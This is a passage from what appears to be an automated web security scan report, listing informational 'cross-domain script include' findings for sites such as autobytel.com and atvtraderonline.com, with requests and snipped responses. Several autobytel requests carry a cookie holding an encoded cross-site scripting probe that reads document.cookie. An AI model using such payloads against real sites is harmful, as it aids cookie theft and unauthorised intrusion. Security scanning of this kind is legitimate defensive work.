Date: Mon, 24 Jan 2011 16:03:29 GMT
Server: Server
x-amz-id-1: 040X2S941YQ8YM9GDF3Y
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: sl07PFCJKDLvXHwNIxyGk0Yh+o6P2TnOLpehS7jphg0PPwo4AItme2BkehKpR0Nz
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=192-0833084-3663062; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 106589


<html>
<head>


<style type="text/css"><!--


BODY { font-family: verdana,arial,helvetica,sans-serif; font-size: x-small; background-color: #FFFFFF; color: #000000; margin-
...[SNIP]...
</script>

<script type="text/javascript" src="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-10089555225.js._V173906659_.js"></script>
...[SNIP]...

21.504. http://www.americascupmedia.com/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.americascupmedia.com
Path:   /index.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4abb7f3a6673ddbf

Request

GET /index.php HTTP/1.1
Host: www.americascupmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:06:26 GMT
Server: Apache
Set-Cookie: PHPSESSID=69ffa747e74ec3fc598608ba70c8ece5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 63617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Americas Cup Media</
...[SNIP]...
</a><script type='text/javascript' src='http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4abb7f3a6673ddbf'></script>
...[SNIP]...

21.505. http://www.armanijeans-theroom.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.armanijeans-theroom.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://code.jquery.com/jquery-1.4.2.min.js
  • http://connect.facebook.net/en_US/all.js

Request

GET / HTTP/1.1
Host: www.armanijeans-theroom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:08:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.15
Vary: Accept-Encoding
Content-Length: 5926
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta property="og:title" content="ArmaniJeans-The Room" />
<meta property="og:description" content="Explore Arman
...[SNIP]...
</script>
   <script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...
</div>
        <script type="text/javascript" src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...

21.506. http://www.aspirationtech.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aspirationtech.org
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.flickr.com/badge_code_v2.gne?count=2&display=random&size=s&layout=v&source=all_tag&tag=aspirationtech&user=28822958%40N00

Request

GET / HTTP/1.1
Host: www.aspirationtech.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:09:02 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESSa1e859be48bff007359d1ff84a233b4d=e6592a496b2ea8707443b03c3285fa30; expires=Thu, 17-Feb-2011 17:42:23 GMT; path=/; domain=.aspirationtech.org
Last-Modified: Tue, 25 Jan 2011 14:09:03 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-C" lang="en-C">
<head>
<
...[SNIP]...
<!-- Start of Flickr Badge -->

<script type="text/javascript" src="http://www.flickr.com/badge_code_v2.gne?count=2&display=random&size=s&layout=v&source=all_tag&tag=aspirationtech&user=28822958%40N00"></script>
...[SNIP]...

21.507. http://www.atvtraderonline.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.atvtraderonline.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
  • http://d.yimg.com/mi/ywa.js

Request

GET / HTTP/1.1
Host: www.atvtraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:23:56 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Set-Cookie: location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Tue, 24-Jan-2012 23:23:56 GMT
Connection: close
Content-Type: text/html
Content-Length: 65145

<!-- dstolweb10-php5b --><!DOCTYPE html>
<html>
<head>
   <title>ATVs for Sale - Bombardier, Polaris, Can-Am, Arctic Cat - ATV Trader.com</title>
   <meta http-equiv="Cache-Control" content="no-cache" />

...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.508. http://www.atvtraderonline.com/find/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.atvtraderonline.com
Path:   /find/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
  • http://d.yimg.com/mi/ywa.js

Request

GET /find/ HTTP/1.1
Host: www.atvtraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:24:06 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 159285


<!-- dstolweb11-php5b -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Find New and Used ATVs, Four Wheelers, All Terrain Vehicles at ATVTraderOnline.com</tit
...[SNIP]...
</script>
       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
<!-- Yahoo tracking Code -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.509. http://www.atvtraderonline.com/research/resources/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.atvtraderonline.com
Path:   /research/resources/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
  • http://d.yimg.com/mi/ywa.js

Request

GET /research/resources/ HTTP/1.1
Host: www.atvtraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:24:10 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 23440


<!-- dstolweb05-php5b -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>ATV Resources: Finance, Insurance, Shipping, and More - ATVTraderOnline.com</title>
   <m
...[SNIP]...
<link rel="stylesheet" media="screen" type="text/css" href="/css/atv-css.php?pageName=resources" />
       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
<!-- Yahoo tracking Code -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.510. http://www.atvtraderonline.com/sell/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.atvtraderonline.com
Path:   /sell/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
  • http://d.yimg.com/mi/ywa.js

Request

GET /sell/ HTTP/1.1
Host: www.atvtraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:24:07 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27006


<!-- dstolweb05-php5b -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Sell Your New or Used ATV fast - ATVTraderOnline.com</title>
   <meta name="description"
...[SNIP]...
<link rel="stylesheet" media="screen" type="text/css" href="/css/atv-css.php?pageName=sell" />
       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
<!-- Yahoo tracking Code -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.511. http://www.autobytel.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/abtl.home/fms;abr=!ie;kw=fms;info=13148;u=|||480F9C2F-ADA0-01E2-EACC2715BA2BAFC8|||13148|||;sz=597x90;ord=43455279?
  • http://ad.doubleclick.net/adj/abtl.home/mtu;abr=!ie;kw=mtu;info=13148;u=|||480F9C2F-ADA0-01E2-EACC2715BA2BAFC8|||13148|||;sz=369x78;!cat=;ord=43455279?
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
  • http://www.bkrtx.com/js/bk-static.js

Request

GET / HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:42:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:42:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:42:23 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 71009


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
8;u=|||480F9C2F-ADA0-01E2-EACC2715BA2BAFC8|||13148|||;sz=369x78;!cat=;ord=43455279?" name="frame1" width="369" height="78" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" border="0">
   <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.home/mtu;abr=!ie;kw=mtu;info=13148;u=|||480F9C2F-ADA0-01E2-EACC2715BA2BAFC8|||13148|||;sz=369x78;!cat=;ord=43455279?">
   </script>
...[SNIP]...
13148;u=|||480F9C2F-ADA0-01E2-EACC2715BA2BAFC8|||13148|||;sz=586x90;ord=43455279?" name="frame1" width="586" height="93" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no">
       <script language="Javascript1.1" SRC="http://ad.doubleclick.net/adj/abtl.home/fms;abr=!ie;kw=fms;info=13148;u=|||480F9C2F-ADA0-01E2-EACC2715BA2BAFC8|||13148|||;sz=597x90;ord=43455279?">
       </script>
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no">
</SCRIPT>
...[SNIP]...

21.512. http://www.autobytel.com/a

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /a

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
  • http://www.bkrtx.com/js/bk-static.js

Request

GET /a HTTP/1.1
Host: www.autobytel.com
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cweb=JONQJVS10.4.128.176CKMMM; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; COUNT=1; TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; HOMEVERSION=2; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; PV_CT=1

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 23309
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 21:06:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 21:06:42 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 21:06:42 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 21:06:42 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=2;path=/


<!-- begin: fnc_getComputerName.cfm -->

<!-- end: fnc_getComputerName.cfm -->
<!-- ReferringSite: www.autobytel.com --> <!-- Referer: http://www.autobytel.com/x22 --> <!--
This fi
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no">
</SCRIPT>
...[SNIP]...

21.513. http://www.autobytel.com/a.cfml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /a.cfml

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
  • http://www.bkrtx.com/js/bk-static.js

Request

GET /a.cfml HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 23425
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:41:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:41:20 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:41:20 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:41:20 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/


<!-- begin: fnc_getComputerName.cfm -->

<!-- end: fnc_getComputerName.cfm -->
<!-- ReferringSite: --> <!-- Referer: None --> <!--
This file creates a boxerjam cookie that expires
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no">
</SCRIPT>
...[SNIP]...

21.514. http://www.autobytel.com/ask-our-mechanics/my-garage.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /ask-our-mechanics/my-garage.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
  • http://www.bkrtx.com/js/bk-static.js

Request

GET /ask-our-mechanics/my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:49:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:49:59 GMT
Content-Length: 22160
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:49:58 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no">
</SCRIPT>
...[SNIP]...

21.515. http://www.autobytel.com/auto-insurance-quotes.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /auto-insurance-quotes.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/abtl.finins/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||483A0EA1-B667-4CC7-17253E160FF12410|||13148|||;sz=728x90;ptile=1;!cat=;ord=54106460?
  • http://ad.doubleclick.net/adj/abtl.finins/;abr=!ie;kw=;info=13148;u=|||483A0EA1-B667-4CC7-17253E160FF12410|||13148|||;sz=160x600;ptile=2;!cat=;ord=54106460?
  • http://ad.doubleclick.net/adj/abtl.finins/;kw=;info=13148;u=|||483A0EA1-B667-4CC7-17253E160FF12410|||13148|||;sz=1x3;!cat=;ord=54106460?
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=yes
  • http://www.bkrtx.com/js/bk-static.js

Request

GET /auto-insurance-quotes.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:47:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:47:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:47:01 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:47:01 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 33642


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
A0EA1-B667-4CC7-17253E160FF12410|||13148|||;sz=728x90;ptile=1;!cat=;ord=54106460?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.finins/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||483A0EA1-B667-4CC7-17253E160FF12410|||13148|||;sz=728x90;ptile=1;!cat=;ord=54106460?"></SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.finins/;kw=;info=13148;u=|||483A0EA1-B667-4CC7-17253E160FF12410|||13148|||;sz=1x3;!cat=;ord=54106460?"></script>
...[SNIP]...
EA1-B667-4CC7-17253E160FF12410|||13148|||;sz=160x600;ptile=2;!cat=;ord=54106460?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.finins/;abr=!ie;kw=;info=13148;u=|||483A0EA1-B667-4CC7-17253E160FF12410|||13148|||;sz=160x600;ptile=2;!cat=;ord=54106460?">
       </SCRIPT>
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=yes">
</SCRIPT>
...[SNIP]...

21.516. http://www.autobytel.com/car-advice.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-advice.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||4840CCCA-008F-5FCD-9106F5804B7D10B7|||13148|||;sz=728x90;ptile=1;!cat=;ord=63939636?
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||4840CCCA-008F-5FCD-9106F5804B7D10B7|||13148|||;sz=160x600;ptile=2;!cat=;ord=63939636?
  • http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||4840CCCA-008F-5FCD-9106F5804B7D10B7|||13148|||;sz=1x3;!cat=;ord=63939636?
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
